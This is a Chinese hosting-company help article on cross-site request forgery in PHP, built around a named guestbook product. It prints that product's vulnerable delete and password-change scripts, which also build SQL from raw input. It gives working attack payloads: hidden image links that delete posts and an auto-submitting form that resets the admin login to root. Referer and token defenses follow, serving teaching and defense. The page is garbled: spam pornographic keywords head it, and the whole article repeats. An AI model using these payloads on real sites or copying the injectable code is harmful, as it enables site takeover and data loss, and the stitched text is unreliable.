激情五月天婷婷,亚洲愉拍一区二区三区,日韩视频一区,a√天堂中文官网8

<ul id="buwfs"><strike id="buwfs"><strong id="buwfs"></strong></strike></ul>
    <output id="buwfs"></output>
  • <dfn id="buwfs"><source id="buwfs"></source></dfn>
      <dfn id="buwfs"><td id="buwfs"></td></dfn>
      <div id="buwfs"><small id="buwfs"></small></div>
      <dfn id="buwfs"><source id="buwfs"></source></dfn>
      1. <dfn id="buwfs"><td id="buwfs"></td></dfn>
        始創(chuàng)于2000年 股票代碼:831685
        咨詢熱線:0371-60135900 注冊有禮 登錄
        • 掛牌上市企業(yè)
        • 60秒人工響應
        • 99.99%連通率
        • 7*24h人工
        • 故障100倍補償
        全部產(chǎn)品
        您的位置: 網(wǎng)站首頁 > 幫助中心>文章內容

        PHP漏洞全解-跨網(wǎng)站請求偽造

        發(fā)布時間:  2012/5/18 18:57:12

        CSRF(Cross Site Request Forgeries),意為跨網(wǎng)站請求偽造,也有寫為XSRF。攻擊者偽造目標用戶的HTTP請求,然后此請求發(fā)送到有CSRF漏洞的網(wǎng)站,網(wǎng)站執(zhí)行此請求后,引發(fā)跨站請求偽造攻擊。攻擊者利用隱蔽的HTTP連接,讓目標用戶在不注意的情況下單擊這個鏈接,由于是用戶自己點擊的,而他又是合法用戶擁有合法權限,所以目標用戶能夠在網(wǎng)站內執(zhí)行特定的HTTP鏈接,從而達到攻擊者的目的。

        例如:某個購物網(wǎng)站購買商品時,采用http://www.shop.com/buy.php?item=watch&num=1,item參數(shù)確定要購買什么物品,num參數(shù)確定要購買數(shù)量,如果攻擊者以隱藏的方式發(fā)送給目標用戶鏈接

        ,那么如果目標用戶不小心訪問以后,購買的數(shù)量就成了1000個

        實例

        隨緣網(wǎng)絡PHP留言板V1.0

        任意刪除留言

        //delbook.php 此頁面用于刪除留言

        1. include_once("dlyz.php"); //dlyz.php用戶驗證權限,當權限是admin的時候方可刪除留言 
        2. include_once("../conn.php"); 
        3. $del=$_GET["del"]; 
        4. $id=$_GET["id"]; 
        5. if ($del=="data"
        6. $ID_Dele= implode(",",$_POST['adid']); 
        7. $sql="delete from book where id in (".$ID_Dele.")"
        8. mysql_query($sql); 
        9. else 
        10. $sql="delete from book where id=".$id//傳遞要刪除的留言ID 
        11. mysql_query($sql); 
        12. mysql_close($conn); 
        13. echo ""
        14. echo "alert(‘刪除成功!’);"
        15. echo " location=’book.php’;"
        16. echo ""
        17. ?> 

        當我們具有admin權限,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言

        利用方法:

        我們使用普通用戶留言(源代碼方式),內容為

        1. "delbook.php?id=2" /> 
        2. "delbook.php?id=3" /> 
        3. "delbook.php?id=4" /> 
        4. "delbook.php?id=5" /> 

        插入4張圖片鏈接分別刪除4個id留言,然后我們返回首頁瀏覽看,沒有什么變化。。圖片顯示不了

        現(xiàn)在我們再用管理員賬號登陸后,來刷新首頁,會發(fā)現(xiàn)留言就剩一條,其他在圖片鏈接中指定的ID號的留言,全部都被刪除。

        攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問這些圖片鏈接的時候,是不具有權限的,所以看不到任何效果,但是當管理員登陸后,查看此留言,就會執(zhí)行隱藏的鏈接,而他的權限又是足夠大的,從而這些留言就被刪除了

        修改管理員密碼

        1. //pass.php 
        2. if($_GET["act"]) 
        3. $username=$_POST["username"]; 
        4. $sh=$_POST["sh"]; 
        5. $gg=$_POST["gg"]; 
        6. $title=$_POST["title"]; 
        7. $copyright=$_POST["copyright"]."
          設計制作:廈門隨緣網(wǎng)絡科技"
        8. $password=md5($_POST["password"]); 
        9. if(emptyempty($_POST["password"])) 
        10. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        11. else 
        12. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        13. mysql_query($sql); 
        14. mysql_close($conn); 
        15. echo ""
        16. echo "alert(‘修改成功!’);"
        17. echo " location=’pass.php’;"
        18. echo ""

        這個文件用于修改管理密碼和網(wǎng)站設置的一些信息,我們可以直接構造如下表單:

        1. <body> 
        2. <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
        3. <input type="radio" value="1" name="sh"> 
        4. <input type="radio" name="sh" checked value="0"> 
        5. <input type="text" name="username" value="root"> 
        6. <input type="password" name="password" value="root"> 
        7. <input type="text" name="title" value="隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)" > 
        8. <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)!textarea> 
        9. <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡PHP留言本V1.0 版權所有:廈門隨緣網(wǎng)絡科技 2005-2009<br/>承接網(wǎng)站建設及系統(tǒng)定制 提供優(yōu)惠主機域名textarea> 
        10. form> 
        11. body> 

        存為attack.html,放到自己網(wǎng)站上http://www.sectop.com/attack.html,此頁面訪問后會自動向目標程序的pass.php提交參數(shù),用戶名修改為root,密碼修改為root,然后我們去留言板發(fā)一條留言,隱藏這個鏈接,管理訪問以后,他的用戶名和密碼全部修改成了root

        防范方法

        防范CSRF要比防范其他攻擊更加困難,因為CSRF的HTTP請求雖然是攻擊者偽造的,但是卻是由目標用戶發(fā)出的,一般常見的防范方法有下面幾種:

        1、檢查網(wǎng)頁的來源

        2、檢查內置的隱藏變量

        3、使用POST,不要使用GET

        檢查網(wǎng)頁來源

        在//pass.php頭部加入以下紅色字體代碼,驗證數(shù)據(jù)提交

        1. if($_GET["act"]) 
        2. if(isset($_SERVER["HTTP_REFERER"])) 
        3. $serverhost = $_SERVER["SERVER_NAME"]; 
        4. $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
        5. $strdomain = explode("/",$strurl); 
        6. $sourcehost = $strdomain[0]; 
        7. if(strncmp($sourcehost$serverhoststrlen($serverhost))) 
        8. {
        9. unset($_POST); 
        10. echo ""
        11. echo "alert(‘數(shù)據(jù)來源異常!’);"
        12. echo " location=’index.php’;";
        13. echo ""
        14. $username=$_POST["username"]; 
        15. $sh=$_POST["sh"]; 
        16. $gg=$_POST["gg"]; 
        17. $title=$_POST["title"]; 
        18. $copyright=$_POST["copyright"]."
          設計制作:廈門隨緣網(wǎng)絡科技"
        19. $password=md5($_POST["password"]); 
        20. if(emptyempty($_POST["password"])) 
        21. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        22. else 
        23. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        24. mysql_query($sql); 
        25. mysql_close($conn); 
        26. echo ""
        27. echo "alert(‘修改成功!’);"
        28. echo " location=’pass.php’;"
        29. echo ""

        檢查內置隱藏變量

        我們在表單中內置一個隱藏變量和一個session變量,然后檢查這個隱藏變量和session變量是否相等,以此來判斷是否同一個網(wǎng)頁所調用

        1. php 
        2. include_once("dlyz.php"); 
        3. include_once("../conn.php"); 
        4. if($_GET["act"]) 
        5. if (!isset($_SESSION["post_id"])) 
        6. // 生成唯一的ID,并使用MD5來加密 
        7. $post_id = md5(uniqid(rand(), true)); 
        8. // 創(chuàng)建Session變量 
        9. $_SESSION["post_id"] = $post_id; 
        10. // 檢查是否相等 
        11. if (isset($_SESSION["post_id"])) 
        12. // 不相等 
        13. if ($_SESSION["post_id"] != $_POST["post_id"]) 
        14. // 清除POST變量 
        15. unset($_POST); 
        16. echo "<script language=’javascript’>"; 
        17. echo "alert(‘數(shù)據(jù)來源異常!’);"; 
        18. echo " location=’index.php’;"; 
        19. echo "script>"; 
        20. …… 
        21. <input type="reset" name="Submit2" value="重 置"> 
        22. <input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
        23. td>tr> 
        24. table> 
        25. form> 
        26. php 
        27. mysql_close($conn); 
        28. ?> 
        29. body> 
        30. html> 

        使用POST,不要使用GET

        傳遞表單字段時,一定要是用POST,不要使用GET,處理變量也不要直接使用$_REQUEST


        本文出自:億恩科技【mszdt.com】
      2. include_once("dlyz.php"); //dlyz.php用戶驗證權限,當權限是admin的時候方可刪除留言 
      3. include_once("../conn.php"); 
      4. $del=$_GET["del"]; 
      5. $id=$_GET["id"]; 
      6. if ($del=="data"
      7. $ID_Dele= implode(",",$_POST['adid']); 
      8. $sql="delete from book where id in (".$ID_Dele.")"
      9. mysql_query($sql); 
      10. else 
      11. $sql="delete from book where id=".$id//傳遞要刪除的留言ID 
      12. mysql_query($sql); 
      13. mysql_close($conn); 
      14. echo ""
      15. echo "alert(‘刪除成功!’);"
      16. echo " location=’book.php’;"
      17. echo ""
      18. ?> 
      19. 當我們具有admin權限,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言

        利用方法:

        我們使用普通用戶留言(源代碼方式),內容為

        1. "delbook.php?id=2" /> 
        2. "delbook.php?id=3" /> 
        3. "delbook.php?id=4" /> 
        4. "delbook.php?id=5" /> 

        插入4張圖片鏈接分別刪除4個id留言,然后我們返回首頁瀏覽看,沒有什么變化。。圖片顯示不了

        現(xiàn)在我們再用管理員賬號登陸后,來刷新首頁,會發(fā)現(xiàn)留言就剩一條,其他在圖片鏈接中指定的ID號的留言,全部都被刪除。

        攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問這些圖片鏈接的時候,是不具有權限的,所以看不到任何效果,但是當管理員登陸后,查看此留言,就會執(zhí)行隱藏的鏈接,而他的權限又是足夠大的,從而這些留言就被刪除了

        修改管理員密碼

        1. //pass.php 
        2. if($_GET["act"]) 
        3. $username=$_POST["username"]; 
        4. $sh=$_POST["sh"]; 
        5. $gg=$_POST["gg"]; 
        6. $title=$_POST["title"]; 
        7. $copyright=$_POST["copyright"]."
          設計制作:廈門隨緣網(wǎng)絡科技"
        8. $password=md5($_POST["password"]); 
        9. if(emptyempty($_POST["password"])) 
        10. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        11. else 
        12. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        13. mysql_query($sql); 
        14. mysql_close($conn); 
        15. echo ""
        16. echo "alert(‘修改成功!’);"
        17. echo " location=’pass.php’;"
        18. echo ""

        這個文件用于修改管理密碼和網(wǎng)站設置的一些信息,我們可以直接構造如下表單:

        1. <body> 
        2. <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
        3. <input type="radio" value="1" name="sh"> 
        4. <input type="radio" name="sh" checked value="0"> 
        5. <input type="text" name="username" value="root"> 
        6. <input type="password" name="password" value="root"> 
        7. <input type="text" name="title" value="隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)" > 
        8. <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)!textarea> 
        9. <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡PHP留言本V1.0 版權所有:廈門隨緣網(wǎng)絡科技 2005-2009<br/>承接網(wǎng)站建設及系統(tǒng)定制 提供優(yōu)惠主機域名textarea> 
        10. form> 
        11. body> 

        存為attack.html,放到自己網(wǎng)站上http://www.sectop.com/attack.html,此頁面訪問后會自動向目標程序的pass.php提交參數(shù),用戶名修改為root,密碼修改為root,然后我們去留言板發(fā)一條留言,隱藏這個鏈接,管理訪問以后,他的用戶名和密碼全部修改成了root

        防范方法

        防范CSRF要比防范其他攻擊更加困難,因為CSRF的HTTP請求雖然是攻擊者偽造的,但是卻是由目標用戶發(fā)出的,一般常見的防范方法有下面幾種:

        1、檢查網(wǎng)頁的來源

        2、檢查內置的隱藏變量

        3、使用POST,不要使用GET

        檢查網(wǎng)頁來源

        在//pass.php頭部加入以下紅色字體代碼,驗證數(shù)據(jù)提交

        1. if($_GET["act"]) 
        2. if(isset($_SERVER["HTTP_REFERER"])) 
        3. $serverhost = $_SERVER["SERVER_NAME"]; 
        4. $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
        5. $strdomain = explode("/",$strurl); 
        6. $sourcehost = $strdomain[0]; 
        7. if(strncmp($sourcehost$serverhoststrlen($serverhost))) 
        8. {
        9. unset($_POST); 
        10. echo ""
        11. echo "alert(‘數(shù)據(jù)來源異常!’);"
        12. echo " location=’index.php’;";
        13. echo ""
        14. $username=$_POST["username"]; 
        15. $sh=$_POST["sh"]; 
        16. $gg=$_POST["gg"]; 
        17. $title=$_POST["title"]; 
        18. $copyright=$_POST["copyright"]."
          設計制作:廈門隨緣網(wǎng)絡科技"
        19. $password=md5($_POST["password"]); 
        20. if(emptyempty($_POST["password"])) 
        21. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        22. else 
        23. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
        24. mysql_query($sql); 
        25. mysql_close($conn); 
        26. echo ""
        27. echo "alert(‘修改成功!’);"
        28. echo " location=’pass.php’;"
        29. echo ""

        檢查內置隱藏變量

        我們在表單中內置一個隱藏變量和一個session變量,然后檢查這個隱藏變量和session變量是否相等,以此來判斷是否同一個網(wǎng)頁所調用

        1. php 
        2. include_once("dlyz.php"); 
        3. include_once("../conn.php"); 
        4. if($_GET["act"]) 
        5. if (!isset($_SESSION["post_id"])) 
        6. // 生成唯一的ID,并使用MD5來加密 
        7. $post_id = md5(uniqid(rand(), true)); 
        8. // 創(chuàng)建Session變量 
        9. $_SESSION["post_id"] = $post_id; 
        10. // 檢查是否相等 
        11. if (isset($_SESSION["post_id"])) 
        12. // 不相等 
        13. if ($_SESSION["post_id"] != $_POST["post_id"]) 
        14. // 清除POST變量 
        15. unset($_POST); 
        16. echo "<script language=’javascript’>"; 
        17. echo "alert(‘數(shù)據(jù)來源異常!’);"; 
        18. echo " location=’index.php’;"; 
        19. echo "script>"; 
        20. …… 
        21. <input type="reset" name="Submit2" value="重 置"> 
        22. <input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
        23. td>tr> 
        24. table> 
        25. form> 
        26. php 
        27. mysql_close($conn); 
        28. ?> 
        29. body> 
        30. html> 

        使用POST,不要使用GET

        傳遞表單字段時,一定要是用POST,不要使用GET,處理變量也不要直接使用$_REQUEST


        本文出自:億恩科技【mszdt.com】
        -->

        服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

      20. 您可能在找
      21. 億恩北京公司:
      22. 經(jīng)營性ICP/ISP證:京B2-20150015
      23. 億恩鄭州公司:
      24. 經(jīng)營性ICP/ISP/IDC證:豫B1.B2-20060070
      25. 億恩南昌公司:
      26. 經(jīng)營性ICP/ISP證:贛B2-20080012
      27. 服務器/云主機 24小時售后服務電話:0371-60135900
      28. 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
      29. 專注服務器托管17年
        掃掃關注-微信公眾號
        0371-60135900
        Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區(qū)翠竹街1號總部企業(yè)基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號
          0
         
         
         
         

        0371-60135900
        7*24小時客服服務熱線